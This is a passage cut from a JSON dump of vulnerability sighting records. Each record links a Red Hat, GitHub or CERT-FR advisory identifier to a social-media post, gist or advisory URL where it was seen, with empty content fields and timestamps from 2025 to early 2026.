"https://gist.github.com/Darkcrai86/d5a3c4c36271c96af862f10a1c5b1b75", "content": "", "creation_timestamp": "2026-01-08T08:01:28.000000Z"}, {"uuid": "414945c7-5449-446f-99e0-51f10267128a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0432", "type": "seen", "source": "https://gist.github.com/Darkcrai86/dc3ed3e95c2b5d2703ad3d70c520c36a", "content": "", "creation_timestamp": "2026-01-12T08:11:48.000000Z"}, {"uuid": "aa62b348-4433-47d7-b67f-4f099d35007e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0426", "type": "seen", "source": "https://gist.github.com/Darkcrai86/d0235e01861944936946fb40dce05486", "content": "", "creation_timestamp": "2026-01-12T08:12:28.000000Z"}, {"uuid": "45e45201-482b-4c5e-8fd8-0cc1ee7c33bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0425", "type": "seen", "source": "https://gist.github.com/Darkcrai86/827e6014efa4d6028c0d9923e9ab0c7d", "content": "", "creation_timestamp": "2026-01-12T08:12:06.000000Z"}, {"uuid": "ffd2f8d7-82fd-45da-a675-5a9536939353", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0422", "type": "seen", "source": "https://gist.github.com/Darkcrai86/66ac9c3b2f5c5518fe699f737cc729e1", "content": "", "creation_timestamp": "2026-01-12T08:12:52.000000Z"}, {"uuid": "ccdb2d4b-938e-4351-bc75-9f5cb290076c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0436", "type": "seen", "source": "https://gist.github.com/Darkcrai86/6a290b45b4ea3203660fde979cc4674b", "content": "", "creation_timestamp": "2026-01-12T08:14:04.000000Z"}, {"uuid": "60df653c-c22c-44a4-af11-b6c74907524c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0421", "type": "seen", "source": "https://gist.github.com/Darkcrai86/15a7a4eab244a2459c5129e8a75eb19e", "content": "", "creation_timestamp": "2026-01-12T08:13:33.000000Z"}, {"uuid": "e86fc691-38e5-4468-b1ef-136b3395a546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0423", "type": "seen", "source": "https://gist.github.com/Darkcrai86/271905f07e3415e8d33577aa39883f9a", "content": "", "creation_timestamp": "2026-01-12T08:15:02.000000Z"}, {"uuid": "848f5c1a-8550-4927-a011-8ee91ad970d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0429", "type": "seen", "source": "https://gist.github.com/Darkcrai86/700fcc03f367cb690d517917d9d1b9cf", "content": "", "creation_timestamp": "2026-01-12T08:14:42.000000Z"}, {"uuid": "b18fc741-be5d-4eaf-aae3-7e16ddbf96ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3cgp-3xvw-98x8", "type": "seen", "source": "https://bsky.app/profile/appsecfeed.bsky.social/post/3mca2asjlaa2w", "content": "", "creation_timestamp": "2026-01-12T12:31:23.818201Z"}, {"uuid": "e73e5b5f-6b3b-47a6-b85b-5b8dca6e3bb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0452", "type": "seen", "source": "https://gist.github.com/Darkcrai86/33fc5fdb9b79141ea7108d3fc6eed4a2", "content": "", "creation_timestamp": "2026-01-12T13:23:55.000000Z"}, {"uuid": "ea66b795-4d46-4182-b9ed-7eab9875c688", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0454", "type": "seen", "source": "https://gist.github.com/Darkcrai86/187c10dda9d3faf317406c1482fd848e", "content": "", "creation_timestamp": "2026-01-12T13:23:31.000000Z"}, {"uuid": "6f99650f-ac1a-4ec3-bda7-932de29c1ccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0437", "type": "seen", "source": "https://gist.github.com/Darkcrai86/356a422c9d28071944d421f216a55e21", "content": "", "creation_timestamp": "2026-01-12T13:24:32.000000Z"}, {"uuid": "fa1b713e-bca0-44e0-922b-40889d08ace2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0443", "type": "seen", "source": "https://gist.github.com/Darkcrai86/05e1c8f8848283a5a8d1dbeae563ebd7", "content": "", "creation_timestamp": "2026-01-12T13:25:56.000000Z"}, {"uuid": "4a2d1503-0763-4211-b127-cb4b0e12b549", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0444", "type": "seen", "source": "https://gist.github.com/Darkcrai86/47401812d9011bf5b417428f59a4bb6b", "content": "", "creation_timestamp": "2026-01-12T13:25:20.000000Z"}, {"uuid": "32631206-aa59-409a-96ae-93f15882ca57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0424", "type": "seen", "source": "https://gist.github.com/Darkcrai86/3cc9ce8a0ecea48c6749ff66fb3d9cd5", "content": "", "creation_timestamp": "2026-01-12T13:26:42.000000Z"}, {"uuid": "ac6172f1-fe5e-4b99-bb65-00f196ab8847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0433", "type": "seen", "source": "https://gist.github.com/Darkcrai86/e79456847f30f12740110f90b710a567", "content": "", "creation_timestamp": "2026-01-12T13:27:39.000000Z"}, {"uuid": "3d86013f-16eb-47fa-a525-85831deceaeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-001", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mca7wtmq352k", "content": "", "creation_timestamp": "2026-01-12T14:13:13.937977Z"}, {"uuid": "8b0c2343-93e2-4147-8ae3-894a5acf3ffa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xg8p-34w2-j49j", "type": "seen", "source": "https://gist.github.com/boxdox/4d0849648ac9426f20211ebf04f174ce", "content": "", "creation_timestamp": "2026-01-12T15:10:37.000000Z"}, {"uuid": "f4267a01-3be3-430a-a337-455909711fd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-001", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mcaejtvkwq2g", "content": "", "creation_timestamp": "2026-01-12T15:35:24.366129Z"}, {"uuid": "dca6fe43-4fd9-4744-a682-56d68dc88be8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-648j-fchv-3hrv", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mcagev3pog2o", "content": "", "creation_timestamp": "2026-01-12T16:08:25.934246Z"}, {"uuid": "1c9dc466-60ea-4a98-b19e-fe65875ebede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cxhj-j78r-p88f", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115883541113725172", "content": "", "creation_timestamp": "2026-01-12T18:28:30.340205Z"}, {"uuid": "a33cffce-5c07-416d-9154-83646ee36ffa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m779-84h5-72q2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115883589086203434", "content": "", "creation_timestamp": "2026-01-12T18:40:42.259248Z"}, {"uuid": "ce902358-50fc-45bc-ae73-b7d59dd5ebde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qhqj-8qw6-wp8v", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115883591759203574", "content": "", "creation_timestamp": "2026-01-12T18:41:23.203449Z"}, {"uuid": "6a8954a6-e28b-4e9b-832f-d3efd66c54db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h934-98h4-j43q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115883594386199798", "content": "", "creation_timestamp": "2026-01-12T18:42:03.106170Z"}, {"uuid": "58119123-1b7c-4107-be65-5c7750680931", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mwr6-3gp8-9jmj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115883640387318884", "content": "", "creation_timestamp": "2026-01-12T18:53:45.150841Z"}, {"uuid": "d1a6edd5-ebd0-4e70-9014-0fc4e68196e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0470", "type": "seen", "source": "https://gist.github.com/Darkcrai86/253a340cf22f25cccc4d5a86436ba41b", "content": "", "creation_timestamp": "2026-01-12T18:58:32.000000Z"}, {"uuid": "671eab67-da2c-45d2-8621-0af4b2dd6133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0468", "type": "seen", "source": "https://gist.github.com/Darkcrai86/29fccda1ae6f32dd5f4a5487a7327939", "content": "", "creation_timestamp": "2026-01-12T18:58:55.000000Z"}, {"uuid": "1157e277-43be-494e-8435-5a1ad7be7348", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0457", "type": "seen", "source": "https://gist.github.com/Darkcrai86/a189f46001a4a5c94fb347131a96da99", "content": "", "creation_timestamp": "2026-01-12T18:59:51.000000Z"}, {"uuid": "ee36132f-2c4e-46d3-8d16-af7cc28d37e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0453", "type": "seen", "source": "https://gist.github.com/Darkcrai86/eb55dd03cc8e7a9e958e54c7a9af3eb0", "content": "", "creation_timestamp": "2026-01-12T19:01:36.000000Z"}, {"uuid": "68cc0ba0-bdb7-489a-a636-336f21da46e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w37m-7fhw-fmv9", "type": "seen", "source": "https://gist.github.com/arindam89/1bbcf7e2ecb26695a24aacf19f638760", "content": "", "creation_timestamp": "2026-01-12T19:24:46.000000Z"}, {"uuid": "64646c14-ce28-45d9-a7ff-1b7d47e44511", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4pr-fm98-w9pg", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/al26-001-vulnerabilities-affecting-n8n-cve-2026-21858-cve-2026-21877-cve-2025-68613", "content": "", "creation_timestamp": "2026-01-12T17:45:54.000000Z"}, {"uuid": "84ee0943-799f-4365-a0e1-6674520d5835", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7hf5-mc28-xmcv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115884408056890236", "content": "", "creation_timestamp": "2026-01-12T22:08:58.809355Z"}, {"uuid": "69082a21-1d41-4842-8887-b60dbe24193d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p837-mrw9-5x5j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115884467125824205", "content": "", "creation_timestamp": "2026-01-12T22:24:00.144263Z"}, {"uuid": "71f16dcc-0f55-429b-a9ea-2140d3496d97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mmq5-27w3-rxpp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115884791375819856", "content": "", "creation_timestamp": "2026-01-12T23:46:27.810258Z"}, {"uuid": "c4f59ed7-e39e-47b5-9263-3e11a3bd92c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vgjq-8cw5-ggw8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115884791375819856", "content": "", "creation_timestamp": "2026-01-12T23:46:27.898124Z"}, {"uuid": "603b8367-65f0-4cc4-8d7e-da15e56b1201", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vxw4-wv6m-9hhh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115884793536498609", "content": "", "creation_timestamp": "2026-01-12T23:47:00.670712Z"}, {"uuid": "cc64cb7f-93d4-4b90-90f1-f5f78b23ffc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c83v-7274-4vgp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115884794589382340", "content": "", "creation_timestamp": "2026-01-12T23:47:16.701707Z"}, {"uuid": "1672f28e-efdb-4b22-8e24-cb24ca811233", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mmq5-27w3-rxpp", "type": "seen", "source": "https://seclists.org/oss-sec/2026/q1/57", "content": "", "creation_timestamp": "2026-01-12T22:19:57.000000Z"}, {"uuid": "674fdb68-f982-415a-999f-ad7d07e144fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8736-pr6r-r9hr", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115350969051297083", "content": "", "creation_timestamp": "2025-10-10T17:08:26.271873Z"}, {"uuid": "21bf72a9-9c87-4bc4-8650-f75e8f2169d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6r98-6qcw-rxrw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115494066188195772", "content": "", "creation_timestamp": "2025-11-04T23:39:54.737064Z"}, {"uuid": "caa0de78-4c9d-4cfb-a077-e98e622da0b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4575-fh42-7848", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115494066188195772", "content": "", "creation_timestamp": "2025-11-04T23:39:54.817309Z"}, {"uuid": "68e48c2e-79bb-4701-ab44-edeffe350053", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrpp-h998-j3pp", "type": "seen", "source": "https://gist.github.com/acumenix/da4429c08a4ca489d788f71283a9f3c9", "content": "", "creation_timestamp": "2025-11-10T06:44:39.000000Z"}, {"uuid": "090745c3-1836-49d1-baa3-0cb9f24dd711", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g9hg-qhmf-q45m", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lyf67jxgtm2l", "content": "", "creation_timestamp": "2025-09-09T07:13:38.576476Z"}, {"uuid": "88c74bd1-8366-4f26-9256-6d30ca3624af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8hrf-pfww-83v9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115509981812578066", "content": "", "creation_timestamp": "2025-11-07T19:07:27.660820Z"}, {"uuid": "5ff35b08-d34e-4a0b-a88b-0ef4346b57e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hh6w-rmjc-26f6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115351702234048336", "content": "", "creation_timestamp": "2025-10-10T20:14:53.061005Z"}, {"uuid": "81166b7e-8ae0-406a-88de-c9cf37b42195", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrpp-h998-j3pp", "type": "seen", "source": "https://gist.github.com/threhan/068f275ecbae261873d8f01540f71a2e", "content": "", "creation_timestamp": "2025-11-10T08:55:47.000000Z"}, {"uuid": "7ca7c649-2441-4ba7-8694-4c1445b7989b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rp2m-q4j6-gr43", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115390812802193403", "content": "", "creation_timestamp": "2025-10-17T18:01:14.146977Z"}, {"uuid": "eff26be6-b3b5-452b-acc8-ff65f4ed3f53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w7xj-8fx7-wfch", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115566520309269245", "content": "", "creation_timestamp": "2025-11-17T18:45:57.409256Z"}, {"uuid": "e3af4c59-f0ab-49b6-a3ad-b9e8ceb0a98b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7944-7c6r-55vv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115391044096635056", "content": "", "creation_timestamp": "2025-10-17T19:00:02.214171Z"}, {"uuid": "acea7d6e-a2f0-45ac-9572-1ecfcd5dbf4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-046", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m46swqeror27", "content": "", "creation_timestamp": "2025-10-27T16:16:40.241356Z"}, {"uuid": "c272dbda-63b8-4fe0-8085-7ca6ab1b7da4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xr7f-qcjc-63rv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115329927054324274", "content": "", "creation_timestamp": "2025-10-06T23:57:10.649037Z"}, {"uuid": "7be90d3d-039e-4e6a-ab2a-b884c80767f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w832-gg5g-x44m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115510417640999900", "content": "", "creation_timestamp": "2025-11-07T20:58:17.986683Z"}, {"uuid": "05169fcb-fc7c-4c04-bace-2e38951b167b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-047", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115486643525731176", "content": "", "creation_timestamp": "2025-11-03T16:12:17.796548Z"}, {"uuid": "c4b9ccc1-7475-4677-97af-459349a27f61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-048", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m5ej7bb4jg2n", "content": "", "creation_timestamp": "2025-11-11T16:03:38.865443Z"}, {"uuid": "4c164c34-f698-4986-8968-8989706abb02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw5c-58hr-m3v3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115255068325860801", "content": "", "creation_timestamp": "2025-09-23T18:39:36.871334Z"}, {"uuid": "fa02926f-aab2-40e3-b752-10697d12d59e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3lyfltr2y4h2u", "content": "", "creation_timestamp": "2025-09-09T11:17:36.018688Z"}, {"uuid": "cb7b11e8-6d8b-4c54-8245-9ede1510b07b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-046", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m4qhdtqze22w", "content": "", "creation_timestamp": "2025-11-03T16:37:10.331161Z"}, {"uuid": "8b173fd7-d88a-4a94-8bb5-d440097efa12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/betterhn50.e-work.xyz/post/3lyfnsfl5or2h", "content": "", "creation_timestamp": "2025-09-09T11:52:38.704197Z"}, {"uuid": "aae0e369-4c6d-41c9-bfd9-d509ce9631f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g9gq-3pfx-2gw2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115616692079959730", "content": "", "creation_timestamp": "2025-11-26T15:25:17.239626Z"}, {"uuid": "77fa28c0-9f51-458a-89be-0e2ac6ea1b76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8397-v66p-539m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115503375634049442", "content": "", "creation_timestamp": "2025-11-06T15:07:25.477994Z"}, {"uuid": "1ffe5caa-f28b-430a-ba2f-17e902b92713", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q754-4pc2-wjqw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115503375634049442", "content": "", "creation_timestamp": "2025-11-06T15:07:25.555462Z"}, {"uuid": "20de9296-33eb-49d8-a9e8-28175f06dbcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jhrq-qvrm-qr36", "type": "seen", "source": "https://bsky.app/profile/silverpill.mitra.social.ap.brid.gy/post/3lym2ckpmwpy2", "content": "", "creation_timestamp": "2025-09-12T00:52:40.325267Z"}, {"uuid": "09e27261-e428-4495-8f3c-b5808c693e03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g9gq-3pfx-2gw2", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3m6k64xuzrg2u", "content": "", "creation_timestamp": "2025-11-26T15:26:41.232273Z"}, {"uuid": "0c6a31e9-b633-4b67-8455-19b6c06e4160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88ph-3236-2m2h", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115583352611017978", "content": "", "creation_timestamp": "2025-11-20T18:06:38.650882Z"}, {"uuid": "e0145832-3b3e-45b2-9459-4a070abab469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/hackernewstop5.bsky.social/post/3lyfqgykikg2k", "content": "", "creation_timestamp": "2025-09-09T12:39:56.437638Z"}, {"uuid": "be121960-e1e6-4e45-b924-99c32e605ccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/hn100.atproto.rocks/post/3lyfrleixrj2c", "content": "", "creation_timestamp": "2025-09-09T13:00:17.249970Z"}, {"uuid": "bb7b74c2-e6a6-45a5-a24a-b9c346ddd65b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/hot.hn/post/3lyfrq2xd432c", "content": "", "creation_timestamp": "2025-09-09T13:02:54.462267Z"}, {"uuid": "4ab3e052-a346-46d8-9349-846f78255747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gv9-mp8m-592r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115090417265707541", "content": "", "creation_timestamp": "2025-08-25T16:46:41.010557Z"}, {"uuid": "cf444a43-f1e2-4822-8694-90c5eabfbcbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/newsyc250.bsky.social/post/3lygfcmhumj27", "content": "", "creation_timestamp": "2025-09-09T18:53:18.016286Z"}, {"uuid": "14ce7a36-6aaf-41d1-b59d-a8c84f5fb073", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cxm3-wv7p-598c", "type": "seen", "source": "https://gist.github.com/Faisalnwz01/9a698c8100956c684518b0fd3ab3fcc6", "content": "", "creation_timestamp": "2025-08-29T14:57:23.000000Z"}, {"uuid": "f448dfa8-e242-4314-b1e8-b3723cf9931e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cxm3-wv7p-598c", "type": "seen", "source": "https://gist.github.com/Faisalnwz01/fdec136600e59ade28ec16b0c684dc73", "content": "", "creation_timestamp": "2025-08-29T14:58:11.000000Z"}, {"uuid": "5f399bad-e8e8-4072-bf08-765ed2590fcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 